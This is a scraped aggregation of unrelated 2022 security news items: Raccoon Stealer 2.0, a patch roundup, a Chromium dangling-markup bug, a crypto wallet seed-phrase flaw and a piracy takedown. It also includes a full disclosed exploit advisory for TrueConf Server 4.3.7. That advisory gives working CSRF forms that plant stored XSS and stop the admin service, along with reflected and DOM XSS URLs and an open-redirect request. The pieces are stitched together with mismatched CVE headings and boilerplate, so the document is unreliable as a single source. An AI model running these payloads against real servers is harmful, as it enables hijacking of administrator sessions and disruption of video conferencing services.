Infamous malware Raccoon Stealer is reportedly back in business after a break.
The post Raccoon Stealer returns with a new bag of tricks appeared first on Malwarebytes Labs.

The popular malware Raccoon stealer, which suspended operations after a developer allegedly died in the Ukraine invasion, has returned.

Raccoon stealer is malware as a service, with the developers selling it to would-be users. The operation is a tightly-run ship, to the extent that customers have digital signatures tied to their executables. If files end up on malware scanning services, the malware authors know exactly who the leak has come from.

**So much data, so little time**

The popular tool, used for data theft, is ubiquitous where stealing credentials is concerned. Cryptocurrency wallets, cookies, passwords, browser autofill data, and credit card data: pretty much anything is up for grabs.

Since 2019, Raccoon stealer has been lifting data from the unwary. Cheap to purchase and packing a large range of features, it is able to steal from as many as 60 different applications including:

**Email**: Outlook, Thunderbird, Thunderbird  
**Browsers**: Firefox, Chrome, Microsoft Edge, Internet Explorer, Vivaldi, SeaMonkey, Vivaldi  
**Cryptocurrency app**s: Exodus, Monero, Electrum, Jaxx

Raccoon’s two most popular delivery methods are phishing campaigns (the tried and tested malicious Word document/Macro combination) and exploit kits. Once data is located on the target system, it is eventually placed into a .zip file and sent to the malware Command and Control (C&C) server.

Its operators are constantly innovating, for example making use of Telegram to operate C&C. This is one malware project which wasn’t going to stay gone for long.

**An all new raccoon rampage**

The new version, Raccoon Stealer 2.0, was claimed as being sold on Telegram and in circulation since May 17. However, these claims related to Telegram have since been shown to be fake.

While functionality appears to be mostly similar to the original version, there are some notable differences. The creators claim to have improved the software and resurrected their malware antics to “honour” the legacy of the teammate who died:

> _After our teammate loss we made a decision that we can not leave our project and we will continue our work in his honour. Raccoon Stealer 2.0 was totally coded from the very beginning. New back-end, new front-end, absolutely new stealer software._

**Smash and grab**

Credit card data, autofill, browser passwords, and a big slice of cryptocurrency wallets are once more targets for Raccoon Stealer. The big change up seems to be related to how data is exfiltrated. This new version doesn’t appear to be particularly stealthy.

The name of the game in data exfiltration is to make as few moves as possible to help evade detection. Sneaky malware will collect data as it goes, before eventually sending the whole lot in a zip in one go. If an infection is constantly pinging away, the chances of it being caught by security tools increases dramatically.

Here, Racoon Stealer seems to be throwing a little caution to the wind. The stealer sends data every single time it adds to its exfiltrated data collection. Researchers note that Raccoon Stealer 2.0 possesses no obfuscation or anti-analysis techniques.

I’d love to know if some sort of data driven analysis led developers to the conclusion that smash and grab is ultimately more suited to their business model than waiting it out. Ultimately, this may be the one bright note for embattled IT admins in the wake of everyone’s least favourite raccoon’s re-emergence onto the malware scene.

Raccoon Stealer returns with a new bag of tricks

Plus: Google issues fixes for Android bugs, and Cisco, Citrix, SAP, WordPress, and more issue major patches for enterprise systems.

June has seen the release of multiple security updates, with important patches issued for the likes of Google's Chrome and Android as well as dozens of patches for Microsoft products, including fixes for a Windows zero-day vulnerability that attackers had already exploited. Apple updates were absent at the time of writing, but the month also included some major enterprise-focused patches for Citrix, SAP, and Cisco products.

Here’s what you need to know about the major patches released in the past month.

Microsoft

Microsoft’s Patch Tuesday release was pretty hefty in June, including fixes for 55 flaws in the tech giant’s products. This Patch Tuesday was particularly important because it addressed an already exploited remote code execution (RCE) issue in Windows dubbed Follina, which Microsoft has been aware of since at least May.

Tracked as CVE-2022-30190, Follina—which takes advantage of vulnerabilities in the Windows Support Diagnostic tool and can execute without the need to open a document—has already been used by multiple criminal groups and state-sponsored attackers.

Three of the vulnerabilities addressed in Patch Tuesday affecting Windows Server are RCE flaws and rated as critical. However, the patches seem to be breaking some VPN and RDP connections, so be careful.

Google Chrome

Google Chrome updates continue to come thick and fast. That’s no bad thing, as the world’s most popular browser is by default one of the biggest targets for hackers. In June, Google released Chrome 103 with patches for 14 vulnerabilities, some of which are serious.

Tracked as CVE-2022-2156, the biggest flaw is a use-after-free issue in Base reported by Google’s Project Zero bug-hunting team that could lead to arbitrary code execution, denial of service, or corruption of data. Worse, when chained with other vulnerabilities the flaw could lead to full system compromise.

Other issues patched in Chrome include vulnerabilities in Interest Groups, WebApp Provider, and a flaw in the V8 Javascript and WebAssembly engine.

Google Android

Of the multiple Android security issues Google patched in June, the most severe is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed, Google said in its Android Security Bulletin.

Google also released updates for its Pixel devices to patch issues in the Android Framework, Media Framework, and System Components.

Samsung users seem to have gotten lucky with Android updates of late, with the device maker rolling out its patches very quickly. The June security update is no different, reaching the Samsung Galaxy Tab S7 series, Galaxy S21 series, Galaxy S22 series, and the Galaxy Z Fold 2 straightaway.

Cisco

Software maker Cisco released a patch in June to fix a critical vulnerability in Cisco Secure Email and Web Manager and Cisco Email Security Appliance that could allow a remote attacker to bypass authentication and log in to the web management interface of an affected device.

The issue, tracked as CVE-2022-20798, could be exploited if an attacker enters something specific on the login page of the affected device, which would provide access to the web-based management interface, Cisco said.

Citrix

Citrix has issued a warning urging users to patch some major vulnerabilities that could let attackers reset admin passwords. The vulnerabilities in Citrix Application Delivery Management could result in corruption of the system by a remote, unauthenticated user, Citrix said in a security bulletin. “The impact of this can include the reset of the administrator password at the next device reboot, allowing an attacker with ssh access to connect with the default administrator credentials after the device has rebooted,” the company wrote.

Citrix recommends that traffic to the Citrix ADM’s IP address be segmented from standard network traffic. This diminishes the risk of exploitation, it said. However, the vendor also urged customers to install the updated versions of Citrix ADM server and Citrix ADM agent “as soon as possible.”

SAP

Software firm SAP has released 12 security patches as part of its June Patch Day, three of which are serious. The first listed by SAP relates to an update released on April 2018 Patch Day and applies to the browser control Google Chromium used by the firm’s business clients. Details of this vulnerability aren’t available, but it has a severity score of 10, so the patch should be applied straightaway.

Another major fix concerns an issue in the SAProuter proxy in NetWeaver and ABAP Platform, which could allow an attacker to execute SAProuter administration commands from a remote client. The third major patch fixes a privilege escalation bug in SAP PowerDesigner Proxy 16.7.

Splunk Enterprise

Splunk has released some out-of-band patches for its Enterprise product, fixing issues including a critical-rated vulnerability that could lead to arbitrary code execution.

Labeled CVE-2022-32158, the flaw could allow an adversary to compromise a Universal Forwarder endpoint and execute code on other endpoints connected to the deployment server. Thankfully, there’s no indication that the vulnerability has been used in any real-world attacks.

Ninja Forms WordPress Plug-In

Ninja Forms, a WordPress plug-in with over a million active installations, has patched a serious issue that’s probably being used by attackers in the wild. “We uncovered a code injection vulnerability that made it possible for unauthenticated attackers to call a limited number of methods in various Ninja Forms classes, including a method that unserialized user-supplied content, resulting in Object Injection,” security analysts at the WordPress Wordfence Threat Intelligence team said in an update.

This could allow attackers to execute arbitrary code or delete arbitrary files on sites where a separate POP chain was present, researchers said.

The flaw has been fully patched in versions 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11. WordPress appears to have performed a forced automatic update for the plug-in, so your site may already be using one of the patched versions.

Atlassian

Australian software company Atlassian has released a patch to fix a zero-day flaw that’s already being exploited by attackers. Tracked as CVE-2022-26134, the RCE vulnerability in the Confluence Server and Data Center can be used to backdoor internet-exposed servers.

GitLab

GitLab has issued patches for versions 15.0.1, 14.10.4, and 14.9.5 for GitLab Community Edition and Enterprise Edition. The updates contain important security fixes for eight vulnerabilities, one of which could allow for account takeover.

With this in mind, the firm “strongly recommends” that all GitLab installations be upgraded to the latest version “as soon as possible.” GitLab.com is already running the patched version.

You Need to Update Windows and Chrome Right Now

Fixed bug could allow attackers to extract sensitive information

Ben Dickson 30 June 2022 at 10:20 UTC

Fixed bug could allow attackers to extract sensitive information

  

A recently-patched security hole in Chromium browsers allowed attackers to bypass safeguards against dangling markup injection’, an attack that extracts sensitive information from webpages.

While dangling markup injection is well-known and -addressed in Chromium browsers, the new attack took advantage of an unaddressed case in how the browser upgrades unsafe HTTP connections.

**Extracting sensitive markup**

Dangling markup injection captures data cross-domain in situations where full cross-site scripting (XSS) attacks aren’t possible.

If an application doesn’t sanitize user-supplied data before integrating it into the markup, an attacker can take advantage to force the page to send some of the page’s markup to their own server.

For example, the attacker can inject HTML markup that includes a specially crafted element that invokes a resource on the attacker’s server and sends HTML markup on the page as the query string to the server.

The Chromium team has been patching dangling markup injection bugs since 2017 and has added restrictions to escape or remove HTML markup inserted into URL strings.

**Safe connection, unsafe markup**

Chromium also has another security feature that upgrades unsafe HTTP protocols used in the HTML markup.

For example, if the src attribute of an tag refers to an HTTP address, the browser automatically upgrades it to HTTPS to enforce encrypted connections.

SeungJu Oh, the security researcher who reported the new bug, discovered that when the browser upgrades an in-page URL from HTTP to HTTPS, it bypasses the dangling markup injection safeguards.

As a result, if an attacker provides a dangling markup injection string that uses the HTTP scheme, it will not go through the dangling markup injection sanitization process when the URL is upgraded to HTTPS.

Oh provided a proof of concept with an tag, but also said that the same scheme works with audio, video, and possibly more tags.

“This allows attackers to get personal information by leaking the user’s content when \[the\] script is unavailable due to security elements such as CSP,” Oh writes.

According to the conversation thread in the Chromium bug report platform, the function that switches the URL protocol to HTTPS causes the dangling markup flag to become false, which in turn bypasses the security checks on the URL string. The bug has been patched in the new version of Chromium-based browsers.

The findings further highlight the necessity to sanitize user input before integrating it into the markup.

It is also a reminder of the complexities of managing the security of products that have many moving parts.

Sometimes, a security fix in one part of the program can break the safeguards in another, as Chromium’s latest dangling markup injection vulnerability shows.

YOU MAY ALSO LIKE UnRAR path traversal flaw can lead to RCE in Zimbra

Chromium browsers vulnerable to dangling markup injection

**According to the CVSS metric, a successful exploitation could lead to a scope change (S:C). What does this mean for this vulnerability?**

This vulnerability could lead to a browser sandbox escape.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220614**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220614)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-33680: Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

A vulnerability classified as problematic was found in TrueConf Server 4.3.7. This vulnerability affects unknown code of the file /admin/service/stop/. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

    TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
    
    
    Vendor: TrueConf LLC
    Product web page: https://www.trueconf.com
    Affected version: 4.3.7.12255 and 4.3.7.12219
    
    Summary: TrueConf Server is a powerful, high-quality and highly secured
    video conferencing software server. It is specially designed to work with
    up to 250 participants in a multipoint conference over LAN or VPN networks.
    TrueConf Server requires no hardware and includes client applications for
    all popular platforms, making it an easy-to-set up, unified communications
    solution.
    
    Desc: The administration interface allows users to perform certain actions
    via HTTP requests without performing any validity checks to verify the requests.
    This can be exploited to perform certain actions with administrative privileges
    if a logged-in user visits a malicious web site.
    
    Input passed via the 'redirect_url' GET parameter is not properly verified before
    being used to redirect users. This can be exploited to redirect a user to an
    arbitrary website e.g. when a user clicks a specially crafted link to the affected
    script hosted on a trusted domain.
    
    TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
    input passed via several parameters to several scripts is not properly sanitized
    before being returned to the user. This can be exploited to execute arbitrary HTML
    and script code in a user's browser session in context of an affected site.
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
               Apache/2.4.17 (Win32)
               PHP/5.4.41
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2017-5393
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
    
    
    01.11.2016
    
    --
    
    
    CSRF Stored XSS:
    ----------------
    
    <html>
      <body>
        <form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
          <input type="hidden" name="send&#95;invite&#95;mail" value="1" />
          <input type="hidden" name="invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="hide&#95;invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="date" value="22&#46;01&#46;2017" />
          <input type="hidden" name="time&#45;field" value="17&#58;27" />
          <input type="hidden" name="time&#95;zone" value="60" />
          <input type="hidden" name="subtype" value="3" />
          <input type="hidden" name="podiums" value="6" />
          <input type="hidden" name="cid" value="&#92;c&#92;dfa95f7e1d" />
          <input type="hidden" name="key" value="dfa95f7e1d" />
          <input type="hidden" name="topic" value="<script>alert&#40;&apos;XSS&apos;&#41;<&#47;script>" />
          <input type="hidden" name="description" value="" />
          <input type="hidden" name="owner" value="" />
          <input type="hidden" name="gconf&#45;edit" value="ok" />
          <input type="hidden" name="webTtype" value="0" />
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>
    
    
    
    Reflected XSS:
    --------------
    
    http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
    http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
    
    
    
    DOM XSS:
    --------
    
    http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
    http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
    
    
    
    Open Redirect:
    --------------
    
    Request:
    
    GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
    Host: 127.0.0.1:8888
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    Response:
    
    HTTP/1.1 302 Found
    Date: Thu, 22 Sep 2016 21:15:40 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: http://www.zeroscience.mk
    Content-Length: 0
    Keep-Alive: timeout=5, max=75
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    
    
    
    CSRF Stop Web Service:
    ----------------------
    
    <html>
      <body>
        <form action="http://127.0.0.1/admin/service/stop/" method="POST">
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>

CVE-2017-20120: Offensive Security’s Exploit Database Archive

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33638.

CVE-2022-33639

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-33638, CVE-2022-33639.

CVE-2022-30192

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33639.

CVE-2022-33638

MetaMask before 10.11.3 might allow an attacker to access a user's secret recovery phrase because an input field is used for a BIP39 mnemonic, and Firefox and Chromium save such fields to disk in order to support the Restore Session feature, aka the Demonic issue.

The Security Research Team at Halborn has discovered a critical vulnerability affecting many major cryptocurrency wallets. Wallets that were affected include MetaMask, Brave, Phantom, and xDefi, who have remediated the issue. 

Under the right conditions, the vulnerability – which we code-named “**Demonic**” – can expose a crypto wallet user’s secret recovery phrase which can in turn be used to reconstruct their private key, allowing attackers to access billions of dollars worth of cryptocurrencies and NFTs held in browser extension wallets.

You can view the full technical details and remediation recommendations on the Demonic Vulnerability announcement page. Refer to the MetaMask Blog Post and Phantom Blog Post for more useful information from their teams.

Due to the severity of the vulnerability and the number of impacted users, technical details were kept confidential until a good faith effort could be made to contact affected wallet providers.  

Now that the wallet providers have had the opportunity to remediate the issue and migrate their users to secure recovery phrases, Halborn is providing in-depth details to raise awareness of the vulnerability and help prevent similar ones in the future.

**How does it work?**

Browser extension cryptocurrency wallets that use an input field for a BIP39 mnemonic can cause the secret recovery phrase to be stored on-disk in plain text where an attacker that has physical or logical access to the device can retrieve it and gain access to the wallet.

**Who is affected? What should they do?**

**Users:** Userswho have imported their browser based crypto wallet using a secret recovery phrase may be impacted. 

The risk is present if all of the following conditions were met:

*   The hard drive was unencrypted
*   The Secret Recovery Phrase was imported into a browser extension wallet using a device that is no longer in the user’s possession or is logically compromised
*   The user used the “Show Secret Recovery Phrase” checkbox to view the seed phrase on-screen during import

It is recommended that users who believe they may be affected migrate to a new set of accounts. MetaMask has prepared instructions on how to migrate for their users. 

Rotating passwords/keys and the use of a hardware wallet in conjunction with the browser based wallet can also provide increased security for users. Enabling local disk encryption is another best practice which mitigates this issue.

Desktop application cryptocurrency wallets and web based wallets may be prone to similar issues but due to the disparity of offerings we have not investigated that in depth.

**Wallet Providers:** Wallet Providers who believe they may still be susceptible to the vulnerability are strongly encouraged to follow the mitigation suggestions outlined on the Demonic Vulnerability Disclosure page.

Have concerns, want to learn more, or have a bug you’d like to disclose? Please reach out to us at \[email protected\].

Halborn is hiring! If you’re someone who can help make our products and this industry more secure, consider joining our team.

Rob Behnke  
06.15.2022

CVE-2022-32969: Halborn Discovers Critical Vulnerability Affecting Crypto Wallet Browser Extensions

By Deeba Ahmed
In the fourth wave of Operation 404, the Brazilian law enforcement agencies blocked/shut down around 226 websites and…
This is a post from HackRead.com Read the original post: Hundreds of Websites and Piracy Apps Seized in US-Brazil’s Operation 404.4

In the fourth wave of Operation 404, the Brazilian law enforcement agencies blocked/shut down around 226 websites and 461 piracy applications. In this anti-piracy initiative, the authorities made several arrests.

**Seizure Details**

The operation was a joint effort from the USA and Brazilian authorities. The US Homeland Security Investigations and the US Department of Justice (DoJ) seized six website domains (Corourbanos.com, Corourbano.com, Pautamp3.com, SIMP3.com, flowactivo.co, and Mp3Teca.ws) operating from the Eastern District of Virginia for streaming and facilitating illegal downloads of copyrighted music in the USA.

Conversely, around 266 additional websites were taken down in Brazil, which were part of the same network along with 15 social network profiles. Moreover, six people were arrested after 30 searches and seizures countrywide.

At the time of publishing this article, all seized domains displayed the following message on their homepage:

> This domain name has been seized by Homeland Security Investigations (HSI) pursuant to a warrant issued by the United States District Court for the Eastern District of Virginia under the authority of, interalia, Title 18, United States Code, Section 2323.

**About Operation 404**

The operation was initiated as an extensive anti-piracy campaign in late 2019. Brazilian law enforcement agencies launched this operation and codenamed it Operation 404 after the HTTP error code.

The authorities collaborated with law enforcement agencies in the UK and the USA. Since then, several waves of the operation ensued under the names Operation 404.2 and Operation 404.3. The operation spanned eleven states. So far, hundreds of pirate sites and streaming apps’ domain names have been blocked.

The latest wave of the operation was titled Operation 404.4. However, the authorities never named the suspects or the sites taken down, but they confirmed that the apps alone were downloaded ten million times. Sources also confirmed that all of them were music-related apps.

Homepage of the seized websites

**The Metaverse Link**

According to a TorrentFreak, issued by Brazilian authorities, the operation against pirated sites and apps was expanded to the metaverse. Brazil’s Cybercrime group of the Secretariat of Integrated Operations (Seopi) coordinator, Alessandro Barreto, explained that criminals created events and maps on platforms like Roblox to market their pirated services and invite interested parties to their video platforms.

However, the authorities didn’t specify how they entered the metaverse. The DoJ noted that four illegal broadcast channels were shut down along with the deactivation of 90 pirated videos.

*   Authorities dismantle online piracy hackers network Sparks Group
*   Pirate Bay Founder Invents Piracy Gadget to Cripple Music Industry
*   3 arrested, 30,000+ piracy sites shut down in global operation IOSX
*   US COVID-19 relief bill to make copyrighted content streaming a felony
*   Flight Sim Lab installed Chrome passwords stealer in piracy check tool

Tag

#chrome